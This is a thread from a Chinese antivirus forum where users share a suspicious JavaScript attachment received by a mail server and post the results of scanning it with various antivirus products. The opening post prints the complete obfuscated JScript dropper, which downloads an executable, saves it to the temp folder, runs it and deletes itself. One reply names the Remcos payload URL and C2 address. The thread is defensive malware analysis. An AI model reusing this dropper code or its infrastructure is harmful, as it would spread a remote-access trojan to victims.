查看: 1512|回复: 16
收起左侧

[可疑文件] 郵箱伺服器收到的可疑js檔案

[复制链接]
megakotaro
发表于 2022-10-26 10:31:26 | 显示全部楼层 |阅读模式
本帖最后由 megakotaro 于 2022-10-26 10:59 编辑

密碼:infected

KES無法偵測,opentip已經有報法
https://opentip.kaspersky.com/CA21396DF7EBA831EA17C98D2FDD4321A8B529BB1A103F9F5F0249F3F69D7494/results?tab=upload



js代碼如下

var _0x4f2af2=_0x3985,_0xcff520=_0x5904;(function(_0x173531,_0x11123b){var _0x57c5d6=_0x3985,_0x36b966=_0x5904,_0x2bd6c=_0x173531();while(!![]){try{var _0x5200a6=parseInt(_0x36b966(0xa7))/0x1*(parseInt(_0x57c5d6(0xa9,'wIWr'))/0x2)+parseInt(_0x36b966(0x95))/0x3+-parseInt(_0x57c5d6(0xa6,'qDqc'))/0x4+-parseInt(_0x36b966(0x94))/0x5+parseInt(_0x36b966(0x8b))/0x6*(-parseInt(_0x57c5d6(0x98,'GHD&'))/0x7)+-parseInt(_0x57c5d6(0xa4,')!Br'))/0x8+parseInt(_0x57c5d6(0xa0,'nL[q'))/0x9*(parseInt(_0x36b966(0x9a))/0xa);if(_0x5200a6===_0x11123b)break;else _0x2bd6c['push'](_0x2bd6c['shift']());}catch(_0x270f0d){_0x2bd6c['push'](_0x2bd6c['shift']());}}}(_0x56df,0x230e6));var pOut=new ActiveXObject('Scripting.FileSystemObject')['GetSpecialFolder'](0x2)+'\x5cNMXCJKHKDFDF.exe',Object=WScript[_0xcff520(0xa1)](_0xcff520(0x8f));function _0x5904(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x5904=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];return _0x51a412;},_0x5904(_0x9c84c,_0x17dd92);}Object[_0x4f2af2(0xaa,'TuLi')](_0x4f2af2(0x9c,'S[46'),_0x4f2af2(0x91,'z3a$'),![]),Object['Send']();function _0x3985(_0x9c84c,_0x17dd92){var _0x56df3f=_0x56df();return _0x3985=function(_0x59043b,_0x196c0a){_0x59043b=_0x59043b-0x8b;var _0x51a412=_0x56df3f[_0x59043b];if(_0x3985['ScXJZs']===undefined){var _0x48fb6a=function(_0x2fd867){var _0x471fd1='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x5578d5='',_0x515abf='';for(var _0x3a4496=0x0,_0x380316,_0x4a0cc6,_0x5cb575=0x0;_0x4a0cc6=_0x2fd867['charAt'](_0x5cb575++);~_0x4a0cc6&&(_0x380316=_0x3a4496%0x4?_0x380316*0x40+_0x4a0cc6:_0x4a0cc6,_0x3a4496++%0x4)?_0x5578d5+=String['fromCharCode'](0xff&_0x380316>>(-0x2*_0x3a4496&0x6)):0x0){_0x4a0cc6=_0x471fd1['indexOf'](_0x4a0cc6);}for(var _0x39283c=0x0,_0x1bb641=_0x5578d5['length'];_0x39283c<_0x1bb641;_0x39283c++){_0x515abf+='%'+('00'+_0x5578d5['charCodeAt'](_0x39283c)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x515abf);};var _0x3985da=function(_0x283da5,_0x2b0fa8){var _0x199236=[],_0x4ba68c=0x0,_0x4f0a58,_0x1a7710='';_0x283da5=_0x48fb6a(_0x283da5);var _0x1252df;for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x199236[_0x1252df]=_0x1252df;}for(_0x1252df=0x0;_0x1252df<0x100;_0x1252df++){_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df]+_0x2b0fa8['charCodeAt'](_0x1252df%_0x2b0fa8['length']))%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58;}_0x1252df=0x0,_0x4ba68c=0x0;for(var _0x2dfa7a=0x0;_0x2dfa7a<_0x283da5['length'];_0x2dfa7a++){_0x1252df=(_0x1252df+0x1)%0x100,_0x4ba68c=(_0x4ba68c+_0x199236[_0x1252df])%0x100,_0x4f0a58=_0x199236[_0x1252df],_0x199236[_0x1252df]=_0x199236[_0x4ba68c],_0x199236[_0x4ba68c]=_0x4f0a58,_0x1a7710+=String['fromCharCode'](_0x283da5['charCodeAt'](_0x2dfa7a)^_0x199236[(_0x199236[_0x1252df]+_0x199236[_0x4ba68c])%0x100]);}return _0x1a7710;};_0x3985['rIGhVh']=_0x3985da,_0x9c84c=arguments,_0x3985['ScXJZs']=!![];}var _0x35bd58=_0x56df3f[0x0],_0x4aa8cc=_0x59043b+_0x35bd58,_0x5e6e2e=_0x9c84c[_0x4aa8cc];return!_0x5e6e2e?(_0x3985['ylfOpK']===undefined&&(_0x3985['ylfOpK']=!![]),_0x51a412=_0x3985['rIGhVh'](_0x51a412,_0x196c0a),_0x9c84c[_0x4aa8cc]=_0x51a412):_0x51a412=_0x5e6e2e,_0x51a412;},_0x3985(_0x9c84c,_0x17dd92);}function _0x56df(){var _0x5edb84=['W6jPqSoOWP7dKCoEoCkGpuSa','5317KmOPsx','W6f/EhCKoWqyAxGaW5GNW64','AmkKl8kSWR/dOb3cHau','j0DGxq','6ZNQDDn','WReGWQrlWQC','o8oIwmkuo8odsaZdHr4','ResponseBody','MSXML2.XMLHTTP','CmkfWOpcRmoJzCkHWQz0WRlcOmof','wSoTBvKHW6rJWRJdV8krESk+W4NcOcNdSCoPW4mJx8k8W7rwr8o9dCkcWPS7WR3cSIlcI8k0W7RdSCobgSo8W7m','Open','jtBcGs3dI8ouvfldVKrAWRW','224295AsaaII','171096WhivHY','Shell.Application','s8kpBvtdTmk7W5lcK0aMbgqW','WRfKgmoxmLuWu8kUWRWglq','WP9dW4/dOCkJovHuW77dLW','3860mnRLVl','ADODB.Stream','DmocW5G','102pIDUIi','W5jrWOBcKqLOtCklhSo+','Type','qCkKW7VcVrJdSSoQWQHEWRu','CreateObject','open','yCo6A0aIWQOLW7NdRCowsCo6W4tcSaddUCkVWPKYwCoCW7HsdCoqna','W4bxlCk/Cqygg8oEW77cQmo5wW','xmkAW7zIuGqU'];_0x56df=function(){return _0x5edb84;};return _0x56df();}var Stream=WScript[_0xcff520(0xa1)](_0xcff520(0x9b));Stream[_0xcff520(0x92)](),Stream[_0xcff520(0x9f)]=0x1,Stream[_0x4f2af2(0x8c,'kpbZ')](Object[_0xcff520(0x8e)]),Stream['Position']=0x0,Stream['SaveToFile'](pOut,0x2),Stream['Close'](),new ActiveXObject(_0xcff520(0x96))['ShellExecute'](pOut,'','',_0xcff520(0xa2),'1'),new ActiveXObject(_0x4f2af2(0xa3,'z3a$'))[_0x4f2af2(0x9e,'cxQS')](WScript[_0x4f2af2(0xa8,'YL!G')]);

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Shake2333
发表于 2022-10-26 10:41:23 | 显示全部楼层
本帖最后由 Shake2333 于 2022-10-26 10:42 编辑

fs双击杀衍生物

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Eset小粉絲
发表于 2022-10-26 11:01:57 | 显示全部楼层
JS/Downloader > Remcos
https[://uiu-auzq5.tk/nn/NMXCJKHKDFDF.exe > C2 51.75.209.245:2404
喀反
发表于 2022-10-26 11:07:18 | 显示全部楼层
卡巴双击杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
lip123
发表于 2022-10-26 11:27:57 | 显示全部楼层
火绒扫描杀

病毒库时间:2022-10-25 17:41
开始时间:2022-10-26 11:26
总计用时:00:00:01
扫描对象:1
扫描文件:1
发现风险:1
已处理风险:1
病毒详情:
风险路径:C:\Users\Administrator.UUMLJDUW4DP6EEO\Desktop\PAYMENT COPY\PAYMENT COPY.js, 病毒名:SVM:TrojanDownloader/JS.MalBehav.gen!D, 病毒ID:aa6434f5bf28f3ff, 处理结果:已处理,删除文件
多变的风向
发表于 2022-10-26 12:12:27 | 显示全部楼层
小A双击

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
kuroandsan
发表于 2022-10-26 12:23:58 | 显示全部楼层
Dr.Web 双击

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Do1phln
发表于 2022-10-26 12:30:38 | 显示全部楼层
360杀毒扫描日志

病毒库日期:2022-10-25
扫描时间:2022-10-26 12:30:18
扫描用时:00:00:01
扫描类型:右键扫描
扫描文件总数:1
项目总数:0
清除项目数:0

扫描选项
----------------------
扫描所有文件:否
扫描压缩包:否
发现病毒处理方式:由用户选择处理
扫描磁盘引导区:是
扫描 Rootkit:否
使用云查杀引擎:是
使用QVM人工智能引擎:是
扫描建议修复项:是
常规引擎设置:

扫描内容
----------------------
\Downloads\PAYMENT COPY


白名单设置
----------------------


扫描结果
======================
未发现威胁文件
ytysh
发表于 2022-10-26 13:12:46 | 显示全部楼层
Ahnlab V3 Lite Miss
PianoA
发表于 2022-10-26 13:58:38 | 显示全部楼层
金山安全终端miss
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 10:39 , Processed in 0.135340 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表